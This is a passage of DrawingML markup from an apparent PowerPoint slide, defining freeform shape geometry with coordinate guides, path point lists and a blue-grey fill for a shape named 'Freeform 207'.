                  <a:gd name="T40" fmla="*/ 13 w 65"/>
                  <a:gd name="T41" fmla="*/ 67 h 95"/>
                  <a:gd name="T42" fmla="*/ 9 w 65"/>
                  <a:gd name="T43" fmla="*/ 62 h 95"/>
                  <a:gd name="T44" fmla="*/ 7 w 65"/>
                  <a:gd name="T45" fmla="*/ 59 h 95"/>
                  <a:gd name="T46" fmla="*/ 9 w 65"/>
                  <a:gd name="T47" fmla="*/ 58 h 95"/>
                  <a:gd name="T48" fmla="*/ 11 w 65"/>
                  <a:gd name="T49" fmla="*/ 55 h 95"/>
                  <a:gd name="T50" fmla="*/ 6 w 65"/>
                  <a:gd name="T51" fmla="*/ 49 h 95"/>
                  <a:gd name="T52" fmla="*/ 10 w 65"/>
                  <a:gd name="T53" fmla="*/ 50 h 95"/>
                  <a:gd name="T54" fmla="*/ 12 w 65"/>
                  <a:gd name="T55" fmla="*/ 48 h 95"/>
                  <a:gd name="T56" fmla="*/ 8 w 65"/>
                  <a:gd name="T57" fmla="*/ 45 h 95"/>
                  <a:gd name="T58" fmla="*/ 5 w 65"/>
                  <a:gd name="T59" fmla="*/ 43 h 95"/>
                  <a:gd name="T60" fmla="*/ 5 w 65"/>
                  <a:gd name="T61" fmla="*/ 39 h 95"/>
                  <a:gd name="T62" fmla="*/ 6 w 65"/>
                  <a:gd name="T63" fmla="*/ 35 h 95"/>
                  <a:gd name="T64" fmla="*/ 8 w 65"/>
                  <a:gd name="T65" fmla="*/ 29 h 95"/>
                  <a:gd name="T66" fmla="*/ 3 w 65"/>
                  <a:gd name="T67" fmla="*/ 30 h 95"/>
                  <a:gd name="T68" fmla="*/ 4 w 65"/>
                  <a:gd name="T69" fmla="*/ 28 h 95"/>
                  <a:gd name="T70" fmla="*/ 4 w 65"/>
                  <a:gd name="T71" fmla="*/ 25 h 95"/>
                  <a:gd name="T72" fmla="*/ 5 w 65"/>
                  <a:gd name="T73" fmla="*/ 22 h 95"/>
                  <a:gd name="T74" fmla="*/ 7 w 65"/>
                  <a:gd name="T75" fmla="*/ 23 h 95"/>
                  <a:gd name="T76" fmla="*/ 9 w 65"/>
                  <a:gd name="T77" fmla="*/ 22 h 95"/>
                  <a:gd name="T78" fmla="*/ 7 w 65"/>
                  <a:gd name="T79" fmla="*/ 21 h 95"/>
                  <a:gd name="T80" fmla="*/ 4 w 65"/>
                  <a:gd name="T81" fmla="*/ 19 h 95"/>
                  <a:gd name="T82" fmla="*/ 3 w 65"/>
                  <a:gd name="T83" fmla="*/ 17 h 95"/>
                  <a:gd name="T84" fmla="*/ 4 w 65"/>
                  <a:gd name="T85" fmla="*/ 16 h 95"/>
                  <a:gd name="T86" fmla="*/ 1 w 65"/>
                  <a:gd name="T87" fmla="*/ 14 h 95"/>
                  <a:gd name="T88" fmla="*/ 1 w 65"/>
                  <a:gd name="T89" fmla="*/ 11 h 95"/>
                  <a:gd name="T90" fmla="*/ 0 w 65"/>
                  <a:gd name="T91" fmla="*/ 7 h 95"/>
                  <a:gd name="T92" fmla="*/ 24 w 65"/>
                  <a:gd name="T93" fmla="*/ 4 h 95"/>
                  <a:gd name="T94" fmla="*/ 30 w 65"/>
                  <a:gd name="T95" fmla="*/ 13 h 95"/>
                  <a:gd name="T96" fmla="*/ 40 w 65"/>
                  <a:gd name="T97" fmla="*/ 21 h 95"/>
                  <a:gd name="T98" fmla="*/ 40 w 65"/>
                  <a:gd name="T99" fmla="*/ 26 h 95"/>
                  <a:gd name="T100" fmla="*/ 40 w 65"/>
                  <a:gd name="T101" fmla="*/ 29 h 95"/>
                  <a:gd name="T102" fmla="*/ 44 w 65"/>
                  <a:gd name="T103" fmla="*/ 33 h 95"/>
                  <a:gd name="T104" fmla="*/ 53 w 65"/>
                  <a:gd name="T105" fmla="*/ 37 h 95"/>
                  <a:gd name="T106" fmla="*/ 62 w 65"/>
                  <a:gd name="T107" fmla="*/ 36 h 95"/>
                  <a:gd name="T108" fmla="*/ 61 w 65"/>
                  <a:gd name="T109" fmla="*/ 43 h 95"/>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65"/>
                  <a:gd name="T166" fmla="*/ 0 h 95"/>
                  <a:gd name="T167" fmla="*/ 65 w 65"/>
                  <a:gd name="T168" fmla="*/ 95 h 95"/>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65" h="95">
                    <a:moveTo>
                      <a:pt x="61" y="43"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="59" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="43"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="96AFCF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36074" name="Freeform 207"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3038" y="2117"/>
                <a:ext cx="65" cy="95"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 55 w 65"/>
                  <a:gd name="T1" fmla="*/ 53 h 95"/>
                  <a:gd name="T2" fmla="*/ 63 w 65"/>
                  <a:gd name="T3" fmla="*/ 72 h 95"/>
                  <a:gd name="T4" fmla="*/ 55 w 65"/>
                  <a:gd name="T5" fmla="*/ 85 h 95"/>
                  <a:gd name="T6" fmla="*/ 52 w 65"/>
                  <a:gd name="T7" fmla="*/ 86 h 95"/>
                  <a:gd name="T8" fmla="*/ 50 w 65"/>
                  <a:gd name="T9" fmla="*/ 86 h 95"/>
                  <a:gd name="T10" fmla="*/ 47 w 65"/>
                  <a:gd name="T11" fmla="*/ 87 h 95"/>
                  <a:gd name="T12" fmla="*/ 43 w 65"/>
                  <a:gd name="T13" fmla="*/ 87 h 95"/>
                  <a:gd name="T14" fmla="*/ 39 w 65"/>
                  <a:gd name="T15" fmla="*/ 89 h 95"/>
                  <a:gd name="T16" fmla="*/ 38 w 65"/>
                  <a:gd name="T17" fmla="*/ 89 h 95"/>
                  <a:gd name="T18" fmla="*/ 35 w 65"/>
                  <a:gd name="T19" fmla="*/ 89 h 95"/>
                  <a:gd name="T20" fmla="*/ 30 w 65"/>
                  <a:gd name="T21" fmla="*/ 93 h 95"/>
                  <a:gd name="T22" fmla="*/ 28 w 65"/>
                  <a:gd name="T23" fmla="*/ 95 h 95"/>
                  <a:gd name="T24" fmla="*/ 19 w 65"/>
                  <a:gd name="T25" fmla="*/ 82 h 95"/>
                  <a:gd name="T26" fmla="*/ 19 w 65"/>
                  <a:gd name="T27" fmla="*/ 78 h 95"/>
                  <a:gd name="T28" fmla="*/ 19 w 65"/>
                  <a:gd name="T29" fmla="*/ 76 h 95"/>
                  <a:gd name="T30" fmla="*/ 22 w 65"/>
                  <a:gd name="T31" fmla="*/ 76 h 95"/>
                  <a:gd name="T32" fmla="*/ 24 w 65"/>
                  <a:gd name="T33" fmla="*/ 74 h 95"/>
                  <a:gd name="T34" fmla="*/ 21 w 65"/>
                  <a:gd name="T35" fmla="*/ 71 h 95"/>
                  <a:gd name="T36" fmla="*/ 18 w 65"/>
                  <a:gd name="T37" fmla="*/ 70 h 95"/>
                  <a:gd name="T38" fmla="*/ 16 w 65"/>
                  <a:gd name="T39" fmla="*/ 69 h 95"/>
                  <a:gd name="T40" fmla="*/ 13 w 65"/>
                  <a:gd name="T41" fmla="*/ 67 h 95"/>
                  <a:gd name="T42" fmla="*/ 9 w 65"/>
                  <a:gd name="T43" fmla="*/ 62 h 95"/>
                  <a:gd name="T44" fmla="*/ 7 w 65"/>
                  <a:gd name="T45" fmla="*/ 59 h 95"/>
                  <a:gd name="T46" fmla="*/ 9 w 65"/>
                  <a:gd name="T47" fmla="*/ 58 h 95"/>
                  <a:gd name="T48" fmla="*/ 11 w 65"/>
                  <a:gd name="T49" fmla="*/ 55 h 95"/>
                  <a:gd name="T50" fmla="*/ 6 w 65"/>
                  <a:gd name="T51" fmla="*/ 49 h 95"/>
                  <a:gd name="T52" fmla="*/ 10 w 65"/>
                  <a:gd name="T53" fmla="*/ 50 h 95"/>
                  <a:gd name="T54" fmla="*/ 12 w 65"/>
                  <a:gd name="T55" fmla="*/ 48 h 95"/>
                  <a:gd name="T56" fmla="*/ 8 w 65"/>
                  <a:gd name="T57" fmla="*/ 45 h 95"/>
                  <a:gd name="T58" fmla="*/ 5 w 65"/>
                  <a:gd name="T59" fmla="*/ 43 h 95"/>
                  <a:gd name="T60" fmla="*/ 5 w 65"/>
                  <a:gd name="T61" fmla="*/ 39 h 95"/>
                  <a:gd name="T62" fmla="*/ 6 w 65"/>
                  <a:gd name="T63" fmla="*/ 35 h 95"/>
                  <a:gd name="T64" fmla="*/ 8 w 65"/>
                  <a:gd name="T65" fmla="*/ 29 h 95"/>
                  <a:gd name="T66" fmla="*/ 3 w 65"/>
                  <a:gd name="T67" fmla="*/ 30 h 95"/>
                  <a:gd name="T68" fmla="*/ 4 w 65"/>
                  <a:gd name="T69" fmla="*/ 28 h 95"/>
                  <a:gd name="T70" fmla="*/ 4 w 65"/>
                  <a:gd name="T71" fmla="*/ 25 h 95"/>
                  <a:gd name="T72" fmla="*/ 5 w 65"/>
                  <a:gd name="T73" fmla="*/ 22 h 95"/>
                  <a:gd name="T74" fmla="*/ 7 w 65"/>
                  <a:gd name="T75" fmla="*/ 23 h 95"/>
                  <a:gd name="T76" fmla="*/ 9 w 65"/>
                  <a:gd name="T77" fmla="*/ 22 h 95"/>
                  <a:gd name="T78" fmla="*/ 7 w 65"/>
                  <a:gd name="T79" fmla="*/ 21 h 95"/>
                  <a:gd name="T80" fmla="*/ 4 w 65"/>
                  <a:gd name="T81" fmla="*/ 19 h 95"/>
                  <a:gd name="T82" fmla="*/ 3 w 65"/>
                  <a:gd name="T83" fmla="*/ 17 h 95"/>
                  <a:gd name="T84" fmla="*/ 4 w 65"/>
                  <a:gd name="T85" fmla="*/ 16 h 95"/>
                  <a:gd name="T86" fmla="*/ 1 w 65"/>
                  <a:gd name="T87" fmla="*/ 14 h 95"/>
                  <a:gd name="T88" fmla="*/ 1 w 65"/>
                  <a:gd name="T89" fmla="*/ 11 h 95"/>
                  <a:gd name="T90" fmla="*/ 0 w 65"/>
                  <a:gd name="T91" fmla="*/ 7 h 95"/>
                  <a:gd name="T92" fmla="*/ 24 w 65"/>
                  <a:gd name="T93" fmla="*/ 4 h 95"/>
                  <a:gd name="T94" fmla="*/ 30 w 65"/>
                  <a:gd name="T95" fmla="*/ 13 h 95"/>
                  <a:gd name="T96" fmla="*/ 40 w 65"/>
                  <a:gd name="T97" fmla="*/ 21 h 95"/>
                  <a:gd name="T98" fmla="*/ 40 w 65"/>
                  <a:gd name="T99" fmla="*/ 26 h 95"/>
                  <a:gd name="T100" fmla="*/ 40 w 65"/>
                  <a:gd name="T101" fmla="*/ 29 h 95"/>
                  <a:gd name="T102" fmla="*/ 44 w 65"/>
                  <a:gd name="T103" fmla="*/ 33 h 95"/>
                  <a:gd name="T104" fmla="*/ 53 w 65"/>
                  <a:gd name="T105" fmla="*/ 37 h 95"/>
                  <a:gd name="T106" fmla="*/ 62 w 65"/>
                  <a:gd name="T107" fmla="*/ 36 h 95"/>
                  <a:gd name="T108" fmla="*/ 61 w 65"/>
                  <a:gd name="T109" fmla="*/ 43 h 95"/>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65"/>
                  <a:gd name="T166" fmla="*/ 0 h 95"/>
                  <a:gd name="T167" fmla="*/ 65 w 65"/>
                  <a:gd name="T168" fmla="*/ 95 h 95"/>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65" h="95">
                    <a:moveTo>
                      <a:pt x="61" y="43"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="59" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
